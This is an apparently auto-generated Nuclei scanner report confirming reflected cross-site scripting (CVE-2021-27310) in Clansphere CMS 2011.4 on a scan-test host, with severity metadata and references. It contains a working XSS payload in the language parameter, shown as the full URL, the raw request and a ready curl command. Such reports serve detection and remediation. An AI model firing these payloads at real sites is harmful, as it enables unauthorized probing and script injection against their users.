Clansphere CMS 2011.4 - Cross-Site Scripting (CVE-2021-27310) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2021-27310 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module

Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/d1979dccee481e292115b89e6c5b03b5

Template Information

Key	Value
Name	Clansphere CMS 2011.4 - Cross-Site Scripting
Authors	alph4byt3
Tags	cve2021, cve, xss, clansphere, csphere
Severity	medium
Description	Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter.
Remediation	To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
CVSS-Metrics	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2021-27310
CVSS-Score	6.10
vendor	csphere
product	clansphere

Request

GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 383
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:07 GMT

GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language'"()&%<yes></script><script>alert(document.domain)</script>&module=module HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3

References:

• https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310
• https://nvd.nist.gov/vuln/detail/CVE-2021-27310
• https://github.com/ARPSyndicate/cvemon
• https://github.com/ARPSyndicate/kenzer-templates

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3' 'https://honey.scanme.sh/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module'

---

Generated by Nuclei v3.2.5